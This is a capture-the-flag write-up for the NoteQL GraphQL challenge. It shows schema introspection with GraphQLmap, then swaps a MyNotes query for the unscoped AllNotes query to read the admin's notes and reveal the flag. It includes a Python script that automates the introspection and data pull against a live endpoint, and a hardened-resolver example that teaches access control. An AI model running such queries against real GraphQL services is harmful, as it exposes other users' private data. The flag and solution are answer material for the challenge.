Challenge Info
I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application?
Solution
The challenge name (NoteQL) and the description give it away straight away: this is a GraphQL application, and the goal is to read notes that belong to another user, the admin.
Visiting the website shows a minimal note-taking front end that talks to a /graphql endpoint:
I used a tool called GraphQLmap to get a better understanding of the GraphQL schema we're dealing with. Its dump_new command sends an introspection query to the endpoint and prints the query fields, mutations and object types together with their arguments:
┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap]
└──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql
Author: @pentest_swissky Version: 1.0
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
AllNotes[Post]:
Note[]: id (ID!),
MyNotes[Post]:
NotesFrom[Post]: author (String!),
Post
id[]:
title[]:
author[]:
completed[]:
Mutation
createNote[]: title (String!),
updateNote[]: id (ID!), title (String!), author (String!),
completeNote[]: id (ID!),
deleteNote[]: id (ID!),
__Schema
__Type
__Field
__InputValue
__EnumValue
__Directive
GraphQLmap >
The schema is small, and one query stands out: AllNotes. MyNotes takes no arguments and presumably returns only the calling user's notes, but AllNotes also takes no arguments and, going by its name, returns every Post in the application; NotesFrom(author: String!) would even let us ask for one user's notes by name. Whether any of these resolvers checks who is asking is exactly what the challenge description hints at.
After adding a note and clicking on the recently added note, the front end issues a MyNotes query. I intercept that request in Burp and change MyNotes to AllNotes in order to dump every note stored in the application; the selection set can stay the same, since both fields return Post objects.
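The same two steps (introspect the schema, then query the unscoped field) scripted in Python, as an added example that is not part of the original writeup and not the challenge's code. It assumes the endpoint accepts a JSON POST with a "query" member and that a session cookie, if the endpoint needs one, is passed on the command line; the introspection and AllNotes responses embedded below are constructed to mirror the schema printed above so the script also runs offline.

```python
import json
import sys
import urllib.request

# Introspection query: lists the root Query/Mutation fields with their arguments and return types.
INTROSPECTION_QUERY = """
query IntrospectRoots {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name kind
      fields {
        name
        args { name type { name kind ofType { name kind } } }
        type { name kind ofType { name kind } }
      }
    }
  }
}
"""

# The rewritten request from the writeup: AllNotes instead of MyNotes, same selection set.
ALL_NOTES_QUERY = "query { AllNotes { id title author completed } }"


def type_name(t):
    """Render an introspection type reference as GraphQL syntax, e.g. NON_NULL(ID) -> 'ID!'."""
    if t is None:
        return "?"
    if t["kind"] == "NON_NULL":
        return type_name(t.get("ofType")) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t.get("ofType")) + "]"
    return t.get("name") or "?"


def summarize_schema(introspection):
    """Map each root type (Query, Mutation) to [(field, [(arg, type)], return type)]."""
    schema = introspection["data"]["__schema"]
    roots = {schema[k]["name"]: [] for k in ("queryType", "mutationType") if schema.get(k)}
    for t in schema["types"]:
        if t["name"] not in roots:
            continue
        for f in t.get("fields") or []:
            args = [(a["name"], type_name(a["type"])) for a in f.get("args") or []]
            roots[t["name"]].append((f["name"], args, type_name(f["type"])))
    return roots


def argless_queries(summary):
    """Query fields with no arguments: nothing scopes them except the resolver, so try them first."""
    return [name for name, args, _ in summary.get("Query", []) if not args]


def notes_by_author(response, author):
    """Pick one author's notes out of an AllNotes response."""
    return [n for n in response["data"]["AllNotes"] if n.get("author") == author]


def post_graphql(url, query, cookie=None):
    """POST a query as JSON (assumed request shape); send the session cookie if given."""
    headers = {"Content-Type": "application/json"}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(url, data=json.dumps({"query": query}).encode(), headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed sample responses (not captured from the challenge) so the script runs offline.
def non_null(scalar):
    return {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": scalar}}

POSTS = {"kind": "LIST", "name": None, "ofType": {"kind": "OBJECT", "name": "Post"}}
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "AllNotes", "args": [], "type": POSTS},
            {"name": "Note", "args": [{"name": "id", "type": non_null("ID")}],
             "type": {"kind": "OBJECT", "name": "Post", "ofType": None}},
            {"name": "MyNotes", "args": [], "type": POSTS},
            {"name": "NotesFrom", "args": [{"name": "author", "type": non_null("String")}], "type": POSTS}]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            {"name": "deleteNote", "args": [{"name": "id", "type": non_null("ID")}],
             "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"name": "Post", "kind": "OBJECT", "fields": []}]}}}
SAMPLE_ALL_NOTES = {"data": {"AllNotes": [
    {"id": "1", "title": "buy milk", "author": "s1gh", "completed": False},
    {"id": "2", "title": "the flag lives here", "author": "admin", "completed": True}]}}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # live: python3 noteql.py http://HOST:PORT/graphql [session-cookie]
        cookie = sys.argv[2] if len(sys.argv) > 2 else None
        intro = post_graphql(sys.argv[1], INTROSPECTION_QUERY, cookie)
        notes = post_graphql(sys.argv[1], ALL_NOTES_QUERY, cookie)
    else:                  # offline: the constructed samples above
        intro, notes = SAMPLE_INTROSPECTION, SAMPLE_ALL_NOTES
    summary = summarize_schema(intro)
    for root, fields in summary.items():
        print(root)
        for name, args, ret in fields:
            print(f"  {name}({', '.join(f'{a}: {t}' for a, t in args)}): {ret}")
    print("argument-less queries:", argless_queries(summary))
    for n in notes_by_author(notes, "admin"):
        print(f"[admin] #{n['id']} {n['title']}")
```

Run without arguments to see the parsed schema and the admin note from the sample data; pass the endpoint URL (and the session cookie if MyNotes needed one) to run it against a live instance. Checking argless_queries first is the general habit behind this challenge: a root field that takes no arguments can only be scoped by what its resolver does with the session, so it is the first place to look for a missing access check.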
And here we find the flag!
Flag: HTB{n0b0dy_c0ntr0ls_m3!!}
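The challenge description's point is that moving from REST to GraphQL does not remove the need for per-field authorization. As an added illustration, not the challenge's code and not any particular GraphQL library's API, here is a resolver for AllNotes in the shape the writeup exploits next to a hardened one that scopes the listing to the caller, plus the same rule applied to NotesFrom. The in-memory store, the viewer dictionary with a name and a role, and the tiny execute wrapper that mimics GraphQL's data/errors response shape are all constructed assumptions.

```python
from dataclasses import asdict, dataclass


@dataclass(frozen=True)
class Note:
    id: str
    title: str
    author: str
    completed: bool = False


# Constructed in-memory store standing in for the application's database.
NOTES = [
    Note("1", "buy milk", "s1gh"),
    Note("2", "rotate the prod keys", "admin", True),
]


class Forbidden(Exception):
    """Raised by a resolver when the viewer may not see the requested data."""


def resolve_all_notes_vulnerable(viewer, store=NOTES):
    """Mirrors the challenge: AllNotes returns every note no matter who asks."""
    return list(store)


def resolve_all_notes(viewer, store=NOTES):
    """Hardened: an anonymous caller is refused, a user sees only their own notes, an admin sees all."""
    if viewer is None:
        raise Forbidden("authentication required")
    if viewer.get("role") == "admin":
        return list(store)
    return [n for n in store if n.author == viewer["name"]]


def resolve_notes_from(viewer, author, store=NOTES):
    """Same rule for NotesFrom(author): a non-admin may only ask for their own name."""
    if viewer is None:
        raise Forbidden("authentication required")
    if viewer.get("role") != "admin" and author != viewer["name"]:
        raise Forbidden("cannot read another user's notes")
    return [n for n in store if n.author == author]


RESOLVERS = {
    "AllNotes": resolve_all_notes,
    "NotesFrom": resolve_notes_from,
}


def execute(viewer, field, **args):
    """Stand-in for a GraphQL executor: run one root field, return the data/errors response shape."""
    try:
        result = RESOLVERS[field](viewer, **args)
        return {"data": {field: [asdict(n) for n in result]}}
    except Forbidden as exc:
        return {"data": {field: None}, "errors": [{"message": str(exc), "path": [field]}]}


if __name__ == "__main__":
    user = {"name": "s1gh", "role": "user"}
    print("vulnerable AllNotes as s1gh:", [n.id for n in resolve_all_notes_vulnerable(user)])
    print("hardened AllNotes as s1gh:  ", execute(user, "AllNotes"))
    print("NotesFrom(admin) as s1gh:   ", execute(user, "NotesFrom", author="admin"))
    print("AllNotes anonymous:         ", execute(None, "AllNotes"))
```

The check lives in the resolver, not in the front end's choice of query name: renaming MyNotes to AllNotes in a request, as done above, only works because the AllNotes resolver never looks at the session.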